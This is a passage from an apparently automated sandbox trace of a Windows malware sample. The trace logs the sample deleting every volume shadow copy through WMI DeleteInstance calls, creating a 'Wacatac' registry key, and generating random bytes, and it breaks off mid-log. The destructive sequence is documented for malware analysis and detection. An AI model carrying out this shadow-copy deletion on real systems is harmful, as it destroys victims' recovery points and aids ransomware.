varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0053.655] lstrlenW (lpString="{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}") returned 38 [0053.655] GetProcessHeap () returned 0x4f10000 [0053.655] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0053.655] lstrlenW (lpString="{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}") returned 38 [0053.655] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'") returned 60 [0053.655] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0054.357] GetProcessHeap () returned 0x4f10000 [0054.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0054.357] IUnknown:Release (This=0x827d0b8) returned 0x0 [0054.357] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d0b8, puReturned=0x17e444*=0x1) returned 0x0 [0054.358] IWbemClassObject:Get (in: This=0x827d0b8, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f6fca4, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0054.359] lstrlenW (lpString="{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}") returned 38 [0054.359] GetProcessHeap () returned 0x4f10000 [0054.359] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0054.359] lstrlenW (lpString="{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}") returned 38 [0054.359] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'") returned 60 [0054.359] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0055.062] GetProcessHeap () returned 0x4f10000 [0055.062] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0055.062] IUnknown:Release (This=0x827d0b8) returned 0x0 [0055.062] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d0b8, puReturned=0x17e444*=0x1) returned 0x0 [0055.063] IWbemClassObject:Get (in: This=0x827d0b8, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f70744, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{1EE90775-4E53-4C29-811E-F4996057D94E}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0055.063] lstrlenW (lpString="{1EE90775-4E53-4C29-811E-F4996057D94E}") returned 38 [0055.063] GetProcessHeap () returned 0x4f10000 [0055.063] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0055.063] lstrlenW (lpString="{1EE90775-4E53-4C29-811E-F4996057D94E}") returned 38 [0055.064] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'") returned 60 [0055.064] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0055.775] GetProcessHeap () returned 0x4f10000 [0055.776] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0055.776] IUnknown:Release (This=0x827d0b8) returned 0x0 [0055.776] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d0b8, puReturned=0x17e444*=0x1) returned 0x0 [0055.777] IWbemClassObject:Get (in: This=0x827d0b8, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f6fca4, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{DC780020-7243-4B55-80A9-4BA6EE67823B}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0055.777] lstrlenW (lpString="{DC780020-7243-4B55-80A9-4BA6EE67823B}") returned 38 [0055.777] GetProcessHeap () returned 0x4f10000 [0055.777] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0055.777] lstrlenW (lpString="{DC780020-7243-4B55-80A9-4BA6EE67823B}") returned 38 [0055.777] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'") returned 60 [0055.777] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0056.449] GetProcessHeap () returned 0x4f10000 [0056.449] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0056.449] IUnknown:Release (This=0x827d0b8) returned 0x0 [0056.449] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d930, puReturned=0x17e444*=0x1) returned 0x0 [0056.450] IWbemClassObject:Get (in: This=0x827d930, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f70744, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{3DBBFF70-A67F-4333-8498-31E7BC089E0F}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0056.450] lstrlenW (lpString="{3DBBFF70-A67F-4333-8498-31E7BC089E0F}") returned 38 [0056.450] GetProcessHeap () returned 0x4f10000 [0056.450] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0056.450] lstrlenW (lpString="{3DBBFF70-A67F-4333-8498-31E7BC089E0F}") returned 38 [0056.450] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'") returned 60 [0056.450] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0057.128] GetProcessHeap () returned 0x4f10000 [0057.128] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0057.128] IUnknown:Release (This=0x827d930) returned 0x0 [0057.128] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d930, puReturned=0x17e444*=0x1) returned 0x0 [0057.131] IWbemClassObject:Get (in: This=0x827d930, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f6fca4, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{1924CB9A-2919-4442-A6C0-E60362A636CF}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0057.131] lstrlenW (lpString="{1924CB9A-2919-4442-A6C0-E60362A636CF}") returned 38 [0057.131] GetProcessHeap () returned 0x4f10000 [0057.131] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0057.131] lstrlenW (lpString="{1924CB9A-2919-4442-A6C0-E60362A636CF}") returned 38 [0057.131] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'") returned 60 [0057.131] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0057.844] GetProcessHeap () returned 0x4f10000 [0057.844] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0057.844] IUnknown:Release (This=0x827d930) returned 0x0 [0057.844] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d930, puReturned=0x17e444*=0x1) returned 0x0 [0057.847] IWbemClassObject:Get (in: This=0x827d930, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f70744, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{5555A914-627B-4AF5-A342-EC1A6421363A}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0057.847] lstrlenW (lpString="{5555A914-627B-4AF5-A342-EC1A6421363A}") returned 38 [0057.847] GetProcessHeap () returned 0x4f10000 [0057.847] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0057.847] lstrlenW (lpString="{5555A914-627B-4AF5-A342-EC1A6421363A}") returned 38 [0057.847] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'") returned 60 [0057.847] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0058.506] GetProcessHeap () returned 0x4f10000 [0058.506] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0058.506] IUnknown:Release (This=0x827d930) returned 0x0 [0058.506] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d930, puReturned=0x17e444*=0x1) returned 0x0 [0058.507] IWbemClassObject:Get (in: This=0x827d930, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f6fca4, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{C7241040-5C13-409D-A239-55D005C03DE9}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0058.508] lstrlenW (lpString="{C7241040-5C13-409D-A239-55D005C03DE9}") returned 38 [0058.508] GetProcessHeap () returned 0x4f10000 [0058.508] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0058.508] lstrlenW (lpString="{C7241040-5C13-409D-A239-55D005C03DE9}") returned 38 [0058.508] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{C7241040-5C13-409D-A239-55D005C03DE9}'") returned 60 [0058.508] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{C7241040-5C13-409D-A239-55D005C03DE9}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0059.279] GetProcessHeap () returned 0x4f10000 [0059.279] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0059.279] IUnknown:Release (This=0x827d930) returned 0x0 [0059.279] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d930, puReturned=0x17e444*=0x1) returned 0x0 [0059.280] IWbemClassObject:Get (in: This=0x827d930, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f70744, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0059.280] lstrlenW (lpString="{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}") returned 38 [0059.280] GetProcessHeap () returned 0x4f10000 [0059.280] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0059.280] lstrlenW (lpString="{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}") returned 38 [0059.280] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'") returned 60 [0059.280] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0060.177] GetProcessHeap () returned 0x4f10000 [0060.177] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0060.177] IUnknown:Release (This=0x827d930) returned 0x0 [0060.177] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d930, puReturned=0x17e444*=0x1) returned 0x0 [0060.177] IWbemClassObject:Get (in: This=0x827d930, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f6fca4, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0060.177] lstrlenW (lpString="{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}") returned 38 [0060.177] GetProcessHeap () returned 0x4f10000 [0060.177] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0060.177] lstrlenW (lpString="{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}") returned 38 [0060.177] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'") returned 60 [0060.178] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0060.804] GetProcessHeap () returned 0x4f10000 [0060.804] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0060.804] IUnknown:Release (This=0x827d930) returned 0x0 [0060.804] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d930, puReturned=0x17e444*=0x1) returned 0x0 [0060.805] IWbemClassObject:Get (in: This=0x827d930, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f70744, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{E369493E-E5B4-449B-8539-770BCA375ABB}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0060.805] lstrlenW (lpString="{E369493E-E5B4-449B-8539-770BCA375ABB}") returned 38 [0060.805] GetProcessHeap () returned 0x4f10000 [0060.805] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0060.805] lstrlenW (lpString="{E369493E-E5B4-449B-8539-770BCA375ABB}") returned 38 [0060.805] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'") returned 60 [0060.805] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0060.894] GetProcessHeap () returned 0x4f10000 [0060.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0060.894] IUnknown:Release (This=0x827d930) returned 0x0 [0060.894] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d930, puReturned=0x17e444*=0x0) returned 0x1 [0060.898] WbemLocator:IUnknown:Release (This=0x827cfdc) returned 0x0 [0060.899] WbemLocator:IUnknown:Release (This=0x827c730) returned 0x0 [0060.899] WbemContext:IUnknown:Release (This=0x827c660) returned 0x0 [0060.899] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Wacatac", ulOptions=0x0, samDesired=0xf003f, phkResult=0x40f1a8 | out: phkResult=0x40f1a8*=0x0) returned 0x2 [0060.900] RegCreateKeyA (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Wacatac", phkResult=0x40f1a8 | out: phkResult=0x40f1a8*=0x608) returned 0x0 [0060.900] GetProcessHeap () returned 0x4f10000 [0060.900] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x50084e0 [0060.900] GetProcessHeap () returned 0x4f10000 [0060.900] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x50084d0 [0060.900] GetProcessHeap () returned 0x4f10000 [0060.900] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x50084b0 [0060.900] GetProcessHeap () returned 0x4f10000 [0060.900] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x50084c0 [0060.900] GetProcessHeap () returned 0x4f10000 [0060.900] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x5008510 [0060.900] GetProcessHeap () returned 0x4f10000 [0060.901] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x4f39d90 [0060.901] GetProcessHeap () returned 0x4f10000 [0060.901] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x4f57248 [0060.901] GetProcessHeap () returned 0x4f10000 [0060.901] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d121e8 [0060.901] GetProcessHeap () returned 0x4f10000 [0060.901] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d121f8 [0060.901] GetProcessHeap () returned 0x4f10000 [0060.901] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12208 [0060.901] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74d40000 [0060.901] GetProcAddress (hModule=0x74d40000, lpProcName="SystemFunction036") returned 0x74d41919 [0060.901] SystemFunction036 (in: RandomBuffer=0x17e380, RandomBufferLength=0x80 | out: RandomBuffer=0x17e380) returned 1 [0060.902] GetProcessHeap () returned 0x4f10000 [0060.902] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x5008510, Size=0x80) returned 0x4f6fc18 [0060.902] GetProcessHeap () returned 0x4f10000 [0060.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x5008510 [0060.902] GetProcessHeap () returned 0x4f10000 [0060.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12218 [0060.902] GetProcessHeap () returned 0x4f10000 [0060.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x102) returned 0x4f8a578 [0060.902] GetProcessHeap () returned 0x4f10000 [0060.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1068) returned 0x4f41780 [0060.902] GetProcessHeap () returned 0x4f10000 [0060.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.902] GetProcessHeap () returned 0x4f10000 [0060.902] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.902] GetProcessHeap () returned 0x4f10000 [0060.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.902] GetProcessHeap () returned 0x4f10000 [0060.902] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.902] GetProcessHeap () returned 0x4f10000 [0060.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.902] GetProcessHeap () returned 0x4f10000 [0060.902] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.902] GetProcessHeap () returned 0x4f10000 [0060.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.903] GetProcessHeap () returned 0x4f10000 [0060.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.903] GetProcessHeap () returned 0x4f10000 [0060.903] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.903] GetProcessHeap () returned 0x4f10000 [0060.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.903] GetProcessHeap () returned 0x4f10000 [0060.903] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.903] GetProcessHeap () returned 0x4f10000 [0060.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.903] GetProcessHeap () returned 0x4f10000 [0060.903] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.903] GetProcessHeap () returned 0x4f10000 [0060.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.903] GetProcessHeap () returned 0x4f10000 [0060.903] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.903] GetProcessHeap () returned 0x4f10000 [0060.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.903] GetProcessHeap () returned 0x4f10000 [0060.903] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.903] GetProcessHeap () returned 0x4f10000 [0060.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.903] GetProcessHeap () returned 0x4f10000 [0060.903] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.903] GetProcessHeap () returned 0x4f10000 [0060.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.903] GetProcessHeap () returned 0x4f10000 [0060.903] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.903] GetProcessHeap () returned 0x4f10000 [0060.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.903] GetProcessHeap () returned 0x4f10000 [0060.903] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.903] GetProcessHeap () returned 0x4f10000 [0060.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.903] GetProcessHeap () returned 0x4f10000 [0060.903] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.904] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.904] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.904] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.904] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.904] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, 